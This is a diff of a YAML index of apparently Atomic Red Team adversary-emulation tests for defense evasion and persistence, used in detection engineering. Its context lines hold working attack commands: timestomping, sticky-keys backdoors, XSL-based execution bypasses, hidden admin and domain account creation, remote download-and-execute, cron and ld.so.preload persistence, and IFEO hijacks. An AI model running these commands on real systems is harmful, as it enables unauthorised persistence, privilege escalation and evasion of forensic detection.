@@ -35605,13 +35605,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file - ' +' supported_platforms: - linux - macos @@ -35623,7 +35623,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} - ' +' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -35669,7 +35669,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} - ' +' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -35692,10 +35692,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -35703,10 +35703,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -35729,10 +35729,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null 
@@ -35740,10 +35740,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -35766,10 +35766,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -35777,10 +35777,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } - ' +' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore - ' +' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -35798,25 +35798,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" - ' +' - description: 'kxwn.lock must be present in #{file_path}. - ' +' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} - ' +' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File - ' +' executor: command: | import-module #{file_path}\timestomp.ps1 
@@ -36790,10 +36790,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) - ' +' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -36801,7 +36801,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r - ' +' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -36824,10 +36824,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -36835,7 +36835,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F - ' +' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -36853,10 +36853,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -36866,7 +36866,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s - ' +' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c 
@@ -36884,10 +36884,10 @@ defense-evasion: dependencies: - description: 'Test requires a file to modify to be located at (#{file_or_folder}) - ' +' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -36925,18 +36925,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) - ' +' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) - ' +' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 - ' +' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1220: @@ -37032,7 +37032,7 @@ defense-evasion: at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: 
@@ -37048,26 +37048,26 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) - ' +' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) - ' +' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" executor: command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} - ' +' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -37076,7 +37076,7 @@ defense-evasion: at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -37091,14 +37091,14 @@ defense-evasion: executor: command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} - ' +' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. - ' +' supported_platforms: - windows input_arguments: 
@@ -37114,17 +37114,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) - ' +' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" - ' +' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -37132,7 +37132,7 @@ defense-evasion: payload. Open Calculator.exe when test sucessfully executed, while AV turned off. - ' +' supported_platforms: - windows input_arguments: @@ -37147,7 +37147,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" - ' +' name: command_prompt persistence: T1546.008: @@ -37241,7 +37241,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -37249,7 +37249,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -37283,7 +37283,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: @@ -37294,7 +37294,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1098: 
@@ -37371,7 +37371,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -37437,7 +37437,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory - ' +' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -37460,14 +37460,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False - ' +' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss - ' +' supported_platforms: - iaas:aws input_arguments: @@ -37479,14 +37479,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test - ' +' executor: command: | aws iam create-group --group-name #{username} @@ -37700,7 +37700,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" - ' +' T1098.001: technique: external_references: @@ -37807,13 +37807,13 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD 
@@ -37884,13 +37884,13 @@ persistence: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: command: | Import-Module -Name AzureAD @@ -37932,7 +37932,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised - ' +' supported_platforms: - iaas:aws input_arguments: @@ -37943,14 +37943,14 @@ persistence: dependencies: - description: 'Check if the user exists. - ' +' prereq_command: 'aws iam list-users | grep #{username} - ' +' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic - ' +' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -38145,11 +38145,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -38158,11 +38158,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll 
@@ -38170,10 +38170,10 @@ persistence: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: @@ -38281,31 +38281,31 @@ persistence: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -38398,7 +38398,7 @@ persistence: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -38414,30 +38414,30 @@ persistence: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -38534,7 +38534,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -38699,10 +38699,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bitsadmin Download (PowerShell) auto_generated_guid: f63b8bc4-07e5-4112-acba-56f646f3f0bc @@ -38726,10 +38726,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' name: powershell - name: Persist, Download, & Execute auto_generated_guid: 62a06ec5-5754-47d2-bcfc-123d8314c6ae @@ -38767,7 +38767,7 @@ persistence: bitsadmin.exe /complete #{bits_job_name} cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' name: command_prompt - name: Bits download using desktopimgdownldr.exe (cmd) auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114 
@@ -38799,10 +38799,10 @@ persistence: command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr - ' +' cleanup_command: 'del #{cleanup_path}\#{cleanup_file} >null 2>&1 - ' +' name: command_prompt T1547: technique: @@ -39127,7 +39127,7 @@ persistence: auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -39147,7 +39147,7 @@ persistence: sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. - ' +' supported_platforms: - windows - macos @@ -39267,7 +39267,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -39312,7 +39312,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" @@ -39350,7 +39350,7 @@ persistence: - description: "#{file_name} must be present\n" prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}" 
@@ -39467,10 +39467,10 @@ persistence: executor: command: 'assoc #{extension_to_change}=#{target_extension_handler} - ' +' cleanup_command: 'assoc #{extension_to_change}=#{original_extension_handler} - ' +' name: command_prompt elevation_required: true T1136.003: @@ -39540,7 +39540,7 @@ persistence: activity do not interupt the normal functions of the compromised users and can remain undetected for a long time - ' +' supported_platforms: - iaas:aws input_arguments: @@ -39551,21 +39551,21 @@ persistence: dependencies: - description: 'Check if ~/.aws/credentials file has a default stanza is configured - ' +' prereq_command: 'cat ~/.aws/credentials | grep "default" - ' +' get_prereq_command: 'echo Please install the aws-cli and configure your AWS defult profile using: aws configure - ' +' executor: command: 'aws iam create-user --user-name #{username} - ' +' cleanup_command: 'aws iam delete-user --user-name #{username} - ' +' name: sh elevation_required: false T1078.004: @@ -39861,7 +39861,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: @@ -39872,17 +39872,17 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob @@ -39894,7 +39894,7 @@ persistence: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments: 
@@ -39905,20 +39905,20 @@ persistence: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1136: @@ -40100,7 +40100,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -40120,7 +40120,7 @@ persistence: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -40128,7 +40128,7 @@ persistence: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -40160,7 +40160,7 @@ persistence: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments: @@ -40177,10 +40177,10 @@ persistence: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1574.001: technique: id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 
@@ -40355,10 +40355,10 @@ persistence: dependencies: - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - ' +' prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" @@ -40366,7 +40366,7 @@ persistence: command: "#{gup_executable}\n" cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - ' +' name: command_prompt T1078.001: technique: @@ -40478,16 +40478,16 @@ persistence: description: 'The Adversaries can activate the default Guest user. The guest account is inactivated by default - ' +' supported_platforms: - windows executor: command: 'net user guest /active:yes - ' +' cleanup_command: 'net user guest /active:no - ' +' name: command_prompt elevation_required: true T1136.002: @@ -40539,7 +40539,7 @@ persistence: auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 description: 'Creates a new domain admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -40561,14 +40561,14 @@ persistence: net group "#{group}" "#{username}" /add /domain cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new account similar to ANONYMOUS LOGON auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 description: 'Create a new account similar to ANONYMOUS LOGON in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -40583,10 +40583,10 @@ persistence: executor: command: 'net user "#{username}" "#{password}" /add /domain - ' +' cleanup_command: 'net user "#{username}" >nul 2>&1 /del /domain - ' +' name: command_prompt elevation_required: false - name: Create a new Domain Account using PowerShell 
@@ -40594,7 +40594,7 @@ persistence: description: 'Creates a new Domain User using the credentials of the Current User - ' +' supported_platforms: - windows input_arguments: @@ -40623,7 +40623,7 @@ persistence: $User cleanup_command: 'cmd /c "net user #{username} /del >nul 2>&1" - ' +' name: powershell elevation_required: false T1078.002: @@ -40986,21 +40986,21 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' - ' +' cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload - ' +' name: bash elevation_required: true - name: Shared Library Injection via LD_PRELOAD @@ -41025,18 +41025,18 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_to_shared_library}) - ' +' prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} - ' +' executor: command: 'LD_PRELOAD=#{path_to_shared_library} ls - ' +' name: bash T1546.014: technique: @@ -41097,7 +41097,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -41386,7 +41386,7 @@ persistence: description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list - ' +' supported_platforms: - windows input_arguments: 
@@ -41399,12 +41399,12 @@ persistence: type: String default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" - ' +' dependency_executor_name: powershell dependencies: - description: 'Chrome must be installed - ' +' prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1} @@ -41624,7 +41624,7 @@ persistence: auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -41640,19 +41640,19 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: IFEO Global Flags auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -41836,7 +41836,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -41860,10 +41860,10 @@ persistence: dependencies: - description: 'The kernel module must exist on disk at specified location - ' +' prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{module_source_path}/* #{temp_folder}/ @@ -41872,7 +41872,7 @@ persistence: executor: command: 'sudo insmod #{module_path} - ' +' cleanup_command: | sudo rmmod #{module_name} [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder} 
@@ -42078,7 +42078,7 @@ persistence: auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900 description: 'Create a plist and execute it - ' +' supported_platforms: - macos input_arguments: @@ -42095,15 +42095,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The shared library doesn''t exist. Check the path"; exit 1; - ' +' executor: name: bash elevation_required: true @@ -42197,7 +42197,7 @@ persistence: auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos input_arguments: @@ -42214,15 +42214,15 @@ persistence: - description: 'The shared library must exist on disk at specified location (#{path_malicious_plist}) - ' +' prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and try again."; exit 1; - ' +' executor: name: bash elevation_required: true @@ -42366,7 +42366,7 @@ persistence: auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -42377,17 +42377,17 @@ persistence: executor: command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a user account on a MacOS system auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: 
@@ -42409,7 +42409,7 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' name: bash elevation_required: true - name: Create a new user in a command prompt @@ -42431,10 +42431,10 @@ persistence: executor: command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create a new user in PowerShell @@ -42452,10 +42452,10 @@ persistence: executor: command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create a new user in Linux with `root` UID and GID. @@ -42463,7 +42463,7 @@ persistence: description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -42481,14 +42481,14 @@ persistence: if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; cleanup_command: 'userdel #{username} - ' +' name: bash elevation_required: true - name: Create a new Windows admin user auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 description: 'Creates a new admin user in a command prompt. - ' +' supported_platforms: - windows input_arguments: @@ -42506,7 +42506,7 @@ persistence: net localgroup administrators "#{username}" /add cleanup_command: 'net user /del "#{username}" >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1078.003: @@ -42634,7 +42634,7 @@ persistence: auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 description: 'Mac logon script - ' +' supported_platforms: - macos executor: 
